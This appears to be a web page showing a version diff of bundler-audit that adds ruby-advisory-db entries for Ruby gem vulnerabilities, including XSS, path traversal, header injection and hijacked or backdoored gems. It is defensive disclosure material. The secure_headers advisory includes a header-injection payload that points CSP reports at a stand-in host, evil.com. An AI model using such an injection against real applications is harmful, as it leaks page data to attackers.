RubyGems - bundler-audit - Versions diffs - 0.6.1 → 0.7.0.1 - Mend

bundler-audit 0.6.1 → 0.7.0.1

Files changed (402) hide show

data/data/ruby-advisory-db/gems/rubyzip/CVE-2019-16892.yml ADDED

@@ -0,0 +1,13 @@
+---
+gem: rubyzip
+cve: 2019-16892
+url: https://github.com/rubyzip/rubyzip/pull/403
+date: 2019-09-12
+title: Denial of Service in rubyzip ("zip bombs")
+description: |
+  In Rubyzip before 1.3.0, a crafted ZIP file can bypass application
+  checks on ZIP entry sizes because data about the uncompressed size
+  can be spoofed. This allows attackers to cause a denial of service
+  (disk consumption).
+patched_versions:
+  - ">= 1.3.0"

data/data/ruby-advisory-db/gems/safemode/CVE-2017-7540.yml ADDED

@@ -0,0 +1,16 @@
+---
+gem: safemode
+cve: 2017-7540
+title: Safemode Gem for Ruby is vulnerable to bypassing safe mode limitations
+date: 2017-04-05
+url: https://nvd.nist.gov/vuln/detail/CVE-2017-7540
+description: |
+  Safemode, as used in Foreman, versions 1.3.2 and earlier are vulnerable
+  to bypassing safe mode limitations via special Ruby syntax. This can
+  lead to deletion of objects for which the user does not have delete
+  permissions or possibly to privilege escalation.
+patched_versions:
+  - ">= 1.3.3"
+related:
+  url:
+    - https://github.com/svenfuchs/safemode/pull/23

data/data/ruby-advisory-db/gems/samlr/CVE-2018-20857.yml ADDED

@@ -0,0 +1,16 @@
+---
+gem: samlr
+cve: 2018-20857
+ghsa: qpxp-5j56-gg3x
+url: https://github.com/zendesk/samlr/pull/29
+date: 2019-07-31
+title: samlr XML nodes comment attack
+description: |
+  Zendesk Samlr before 2.6.2 allows an XML nodes comment attack such as
+  a name_id node with user@example.com followed by <!---->. and then the attacker's
+  domain name.
+cvss_v3: 7.5
+patched_versions:
+- ">= 2.6.2"

data/data/ruby-advisory-db/gems/sanitize/CVE-2018-3740.yml ADDED

@@ -0,0 +1,22 @@
+---
+gem: sanitize
+cve: 2018-3740
+date: 2018-03-19
+url: https://github.com/rgrove/sanitize/issues/176
+title: HTML injection/XSS in Sanitize
+description: |
+  When Sanitize gem is used in combination with libxml2 >= 2.9.2,
+  a specially crafted HTML fragment can cause libxml2 to generate
+  improperly escaped output, allowing non-whitelisted attributes to be
+  used on whitelisted elements.
+  This can allow HTML and JavaScript injection, which could result in XSS
+  if Sanitize's output is served to browsers.
+unaffected_versions:
+  - "< 1.1.0"
+patched_versions:
+  - "~> 2.1.1"
+  - ">= 4.6.3"
+related:
+  url:
+    - https://github.com/rgrove/sanitize/commit/01629a162e448a83d901456d0ba8b65f3b03d46e

data/data/ruby-advisory-db/gems/secure_headers/CVE-2020-5216.yml ADDED

@@ -0,0 +1,52 @@
+---
+gem: secure_headers
+cve: 2020-5216
+ghsa: w978-rmpf-qmwg
+url: https://github.com/twitter/secure_headers/security/advisories/GHSA-w978-rmpf-qmwg
+date: 2020-01-23
+title: secure_headers header injection due to newline
+description: |-
+  If user-supplied input was passed into append/override_content_security_policy_directives,
+  a newline could be injected leading to limited header injection.
+  Upon seeing a newline in the header, rails will silently create a new Content-Security-Policy
+  header with the remaining value of the original string. It will continue to create new headers
+  for each newline.
+  e.g.
+  ```
+  override_content_security_directives(script_src: ['mycdn.com', "\ninjected\n"])
+  ```
+  would result in
+  ```
+  Content-Security-Policy: ... script-src: mycdn.com
+  Content-Security-Policy: injected
+  Content-Security-Policy: rest-of-the-header
+  ```
+  CSP supports multiple headers and all policies must be satisfied for execution to occur, but a malicious value that reports the current page is fairly trivial:
+  ```
+  override_content_security_directives(script_src: ["mycdn.com", "\ndefault-src 'none'; report-uri evil.com"])
+  ```
+  ```
+  Content-Security-Policy: ... script-src: mycdn.com
+  Content-Security-Policy: default-src 'none'; report-uri evil.com
+  Content-Security-Policy: rest-of-the-header
+  ```
+  Workarounds
+  ```
+  override_content_security_policy_directives(:frame_src, [user_input.gsub("\n", " ")])
+  ```
+cvss_v3: 4.4
+patched_versions:
+  - "~> 3.9"
+  - "~> 5.2"
+  - ">= 6.3.0"

data/data/ruby-advisory-db/gems/secure_headers/CVE-2020-5217.yml ADDED

@@ -0,0 +1,42 @@
+---
+gem: secure_headers
+cve: 2020-5217
+ghsa: xq52-rv6w-397c
+url: https://github.com/twitter/secure_headers/security/advisories/GHSA-xq52-rv6w-397c
+date: 2020-01-23
+title: secure_headers directive injection using semicolon
+description: |-
+  If user-supplied input was passed into append/override_content_security_policy_directives,
+  a semicolon could be injected leading to directive injection.
+  This could be used to e.g. override a script-src directive. Duplicate directives are ignored
+  and the first one wins. The directives in secure_headers are sorted alphabetically so they
+  pretty much all come before script-src. A previously undefined directive would receive a value
+  even if SecureHeaders::OPT_OUT was supplied.
+  The fixed versions will silently convert the semicolons to spaces and emit a deprecation warning
+  when this happens. This will result in innocuous browser console messages if being
+  exploited/accidentally used. In future releases, we will raise application errors resulting in
+  500s.
+  > Duplicate script-src directives detected. All but the first instance will be ignored.
+  See https://www.w3.org/TR/CSP3/#parse-serialized-policy
+  > Note: In this case, the user agent SHOULD notify developers that a duplicate directive was
+  > ignored. A console warning might be appropriate, for example.
+  # Workarounds
+  If you are passing user input into the above methods, you could filter out the input:
+  ```
+  override_content_security_policy_directives(:frame_src, [user_input.gsub(";", " ")])
+  ```
+cvss_v3: 4.4
+patched_versions:
+  - "~> 3.8"
+  - "~> 5.1"
+  - ">= 6.2.0"

data/data/ruby-advisory-db/gems/sentry-raven/{OSVDB-115654.yml → CVE-2014-9490.yml} RENAMED

@@ -2,7 +2,7 @@
 gem: sentry-raven
 cve: 2014-9490
 osvdb: 115654
-url: http://osvdb.org/show/osvdb/115654
+url: https://nvd.nist.gov/vuln/detail/CVE-2014-9490
 title: sentry-raven Gem for Ruby contains a flaw that can result in a denial of service
 date: 2014-12-08
 description: Sentry raven-ruby contains a flaw in the lib/raven/okjson.rb script

data/data/ruby-advisory-db/gems/sfpagent/{OSVDB-105971.yml → CVE-2014-2888.yml} RENAMED

@@ -2,7 +2,7 @@
 gem: sfpagent
 cve: 2014-2888
 osvdb: 105971
-url: http://www.osvdb.org/show/osvdb/105971
+url: https://nvd.nist.gov/vuln/detail/CVE-2014-2888
 title: sfpagent Gem for Ruby JSON[body] Module Name Remote Command Execution
 date: 2014-04-16
 description: |

data/data/ruby-advisory-db/gems/show_in_browser/{OSVDB-93490.yml → CVE-2013-2105.yml} RENAMED

@@ -2,7 +2,7 @@
 gem: show_in_browser
 cve: 2013-2105
 osvdb: 93490
-url: http://osvdb.org/show/osvdb/93490
+url: https://nvd.nist.gov/vuln/detail/CVE-2013-2105
 title: Show In Browser Gem for Ruby /tmp/browser.html Arbitrary Script Injection
 date: 2013-05-17
 description: Show In Browser Gem for Ruby contains a flaw that is triggered when the application does not validate input passed via the /tmp/browser.html file. This may allow a local attacker to create a specially crafted request that would execute arbitrary script code in a user's browser.

data/data/ruby-advisory-db/gems/simple_captcha2/CVE-2019-14282.yml ADDED

@@ -0,0 +1,13 @@
+---
+gem: simple_captcha2
+cve: 2019-14282
+url: https://github.com/rubygems/rubygems.org/issues/2073
+date: 2019-07-31
+title: Code backdoor in simple_captcha2
+description: |
+  The simple_captcha2 gem 0.2.3 for Ruby, as distributed on RubyGems.org,
+  included a code-execution backdoor inserted by a third party.
+unaffected_versions:
+  - "< 0.2.3"
+  - "> 0.2.3"
+cvss_v3: 9.8

data/data/ruby-advisory-db/gems/simple_form/CVE-2019-16676.yml ADDED

@@ -0,0 +1,15 @@
+---
+gem: simple_form
+cve: 2019-16676
+ghsa: r74q-gxcg-73hx
+url: https://github.com/plataformatec/simple_form/security/advisories/GHSA-r74q-gxcg-73hx
+title: simple_form Gem for Ruby Incorrect Access Control for forms based on user input
+date: 2019-09-27
+description: |
+  Simple Form before 5.0 has Incorrect Access Control in `file_method?` in `lib/simple_form/form_builder.rb`,
+  because a user-supplied string is invoked as a method call.
+  This only happens for pages that build forms based on user input.
+patched_versions:
+  - ">= 5.0"

data/data/ruby-advisory-db/gems/sinatra/CVE-2018-11627.yml ADDED

@@ -0,0 +1,16 @@
+---
+gem: sinatra
+cve: 2018-11627
+url: https://github.com/sinatra/sinatra/issues/1428
+title: XSS via the 400 Bad Request page
+date: 2018-05-31
+description: |
+  Sinatra before 2.0.2 has XSS via the 400 Bad Request page that occurs upon a params parser exception.
+cvss_v3: 6.1
+patched_versions:
+  - ">= 2.0.2"
+unaffected_versions:
+  - "< 2.0.0.beta1"
+  - "2.0.0-alpha"

data/data/ruby-advisory-db/gems/sinatra/CVE-2018-7212.yml ADDED

@@ -0,0 +1,19 @@
+---
+gem: sinatra
+cve: 2018-7212
+url: https://github.com/sinatra/sinatra/pull/1379
+date: 2018-01-09
+title: sinatra ruby gem path traversal via backslash characters on Windows
+description: |
+  An issue was discovered in rack-protection/lib/rack/protection/path_traversal.rb
+  in Sinatra 2.x before 2.0.1 on Windows. Path traversal is possible via backslash
+  characters.
+cvss_v3: 5.3
+cvss_v2: 5.0
+patched_versions:
+  - ">= 2.0.1"
+unaffected_versions:
+  - "< 2.0.0"

data/data/ruby-advisory-db/gems/slanger/CVE-2019-1010306.yml ADDED

@@ -0,0 +1,16 @@
+---
+gem: slanger
+cve: 2019-1010306
+ghsa: rg32-m3hf-772v
+url: https://github.com/stevegraham/slanger/pull/238
+date: 2019-07-16
+title: Arbitrary command execution in slanger
+description: |
+  A remote attacker can execute arbitrary commands by sending a crafted request to the server.
+  This is due to the use of `Oj.load` instead of `Oj.strict_load` when processing messages.
+  Note that `slanger` is no longer maintained.
+patched_versions:
+  - ">= 0.6.1"
+cvss_v3: 9.8

data/data/ruby-advisory-db/gems/smart_proxy_dynflow/CVE-2018-14643.yml ADDED

@@ -0,0 +1,18 @@
+---
+gem: smart_proxy_dynflow
+cve: 2018-14643
+url: https://github.com/theforeman/smart_proxy_dynflow/pull/54
+date: 2018-09-14
+title: smart_proxy_dynflow gem authentication bypass in Foreman remote execution feature
+description: |
+  An authentication bypass flaw was found in the smart_proxy_dynflow component
+  used by Foreman. A malicious attacker can use this flaw to remotely execute arbitrary
+  commands on machines managed by vulnerable Foreman instances, in a highly privileged
+  context.
+cvss_v3: 9.8
+cvss_v2: 10.0
+patched_versions:
+  - ~> 0.1.11
+  - ">= 0.2.1"

data/data/ruby-advisory-db/gems/sorcery/CVE-2020-11052.yml ADDED

@@ -0,0 +1,27 @@
+---
+gem: sorcery
+cve: 2020-11052
+ghsa: jc8m-cxhj-668x
+url: https://github.com/Sorcery/sorcery/security/advisories/GHSA-jc8m-cxhj-668x
+date: 2020-05-07
+title: Improper Restriction of Excessive Authentication Attempts in Sorcery
+description: |-
+  ### Impact
+  Brute force vulnerability when using password authentication via Sorcery.
+  The brute force protection submodule will prevent a brute force attack for
+  the defined lockout period, but once expired protection will not be re-enabled
+  until a user or malicious actor logs in successfully. This does not affect users
+  that do not use the built-in brute force protection submodule, nor users that use
+  permanent account lockout.
+  ### Patches
+  Patched as of version `0.15.0`.
+  ### Workarounds
+  Currently no workarounds, other than monkey patching the authenticate method
+  provided by Sorcery or upgrading to version `0.15.0`.
+cvss_v3: 8.3
+patched_versions:
+  - ">= 0.15.0"

data/data/ruby-advisory-db/gems/sounder/{OSVDB-96278.yml → CVE-2013-5647.yml} RENAMED

@@ -2,7 +2,7 @@
 gem: sounder
 cve: 2013-5647
 osvdb: 96278
-url: http://www.osvdb.org/show/osvdb/96278
+url: https://nvd.nist.gov/vuln/detail/CVE-2013-5647
 title: Sounder Gem for Ruby File Name Handling Arbitrary Command Execution
 date: 2013-08-14
 description: |

data/data/ruby-advisory-db/gems/sprockets/CVE-2018-3760.yml ADDED

@@ -0,0 +1,23 @@
+---
+gem: sprockets
+cve: 2018-3760
+url: https://groups.google.com/forum/#!topic/ruby-security-ann/2S9Pwz2i16k
+title: Path Traversal in Sprockets
+date: 2018-06-19
+description: |
+  Specially crafted requests can be used to access files that exist on
+  the filesystem that is outside an application's root directory, when the
+  Sprockets server is used in production.
+  All users running an affected release should either upgrade or use one of the work arounds immediately.
+  Workaround:
+  In Rails applications, work around this issue, set `config.assets.compile = false` and
+  `config.public_file_server.enabled = true` in an initializer and precompile the assets.
+   This work around will not be possible in all hosting environments and upgrading is advised.
+patched_versions:
+  - ">= 2.12.5, < 3.0.0"
+  - ">= 3.7.2, < 4.0.0"
+  - ">= 4.0.0.beta8"

data/data/ruby-advisory-db/gems/sprout/{OSVDB-100598.yml → CVE-2013-6421.yml} RENAMED

@@ -2,7 +2,7 @@
 gem: sprout
 cve: 2013-6421
 osvdb: 100598
-url: http://www.osvdb.org/show/osvdb/100598
+url: https://nvd.nist.gov/vuln/detail/CVE-2013-6421
 title: sprout Gem for Ruby archive_unpacker.rb unpack_zip() Function Multiple Parameter Arbitrary Code Execution
 date: 2013-12-02
 description: |

data/data/ruby-advisory-db/gems/strong_password/CVE-2019-13354.yml ADDED

@@ -0,0 +1,19 @@
+---
+gem: strong_password
+cve: 2019-13354
+url: https://withatwist.dev/strong-password-rubygem-hijacked.html
+title: strong_password Ruby gem malicious version causing Remote Code Execution vulnerability
+date: 2019-07-05
+description: |
+  The `strong_password` gem on RubyGems.org was hijacked by a malicious actor. The
+  malicious actor published v0.0.7 containing malicious code that enables an attacker
+  to execute remote code in production.
+  Upgrade `strong_password` to v0.0.8 to ensure no malicious code execution is possible.
+patched_versions:
+  - ">= 0.0.8"
+unaffected_versions:
+  - "!= 0.0.7"

data/data/ruby-advisory-db/gems/thumbshooter/{OSVDB-91839.yml → CVE-2013-1898.yml} RENAMED

@@ -2,7 +2,7 @@
 gem: thumbshooter
 cve: 2013-1898
 osvdb: 91839
-url: http://osvdb.org/show/osvdb/91839
+url: https://nvd.nist.gov/vuln/detail/CVE-2013-1898
 title: Thumbshooter Gem for Ruby thumbshooter.rb URL Shell Metacharacter Injection Arbitrary Command Execution
 date: 2013-03-26
 description: Thumbshooter Gem for Ruby contains a flaw that is due to the program failing to properly sanitize input passed to thumbshooter.rb. With a specially crafted URL that contains shell metacharacters, a context-dependent attacker can execute arbitrary commands.

data/data/ruby-advisory-db/gems/twitter-bootstrap-rails/OSVDB-109206.yml CHANGED

@@ -3,7 +3,7 @@ gem: twitter-bootstrap-rails
 framework: rails
 cve: 2014-4920
 osvdb: 109206
-url: https://nvisium.com/blog/2014/03/28/reflected-xss-vulnerability-in-twitter/
+url: https://nvisium.com/blog/2014/03/28/reflected-xss-vulnerability-in-twitter
 title: Reflective XSS Vulnerability in twitter-bootstrap-rails
 date: 2014-03-25

data/data/ruby-advisory-db/gems/user_agent_parser/CVE-2020-5243.yml ADDED

@@ -0,0 +1,28 @@
+---
+gem: user_agent_parser
+cve: 2020-5243
+ghsa: pcqq-5962-hvcw
+url: https://github.com/ua-parser/uap-ruby/security/advisories/GHSA-pcqq-5962-hvcw
+date: 2020-03-10
+title: Denial of Service in uap-core when processing crafted User-Agent strings
+description: |-
+  ### Impact
+  Some regexes are vulnerable to regular expression denial of service (REDoS) due to
+  overlapping capture groups. This allows remote attackers to overload a server by
+  setting the User-Agent header in an HTTP(S) request to maliciously crafted long
+  strings.
+  ### Patches
+  Please update `uap-ruby` to &gt;= v2.6.0
+  ### For more information
+  https://github.com/ua-parser/uap-core/security/advisories/GHSA-cmcx-xhr8-3w9p
+cvss_v3: 5.7
+patched_versions:
+  - ">= 2.6.0"
+related:
+  ghsa:
+    - cmcx-xhr8-3w9p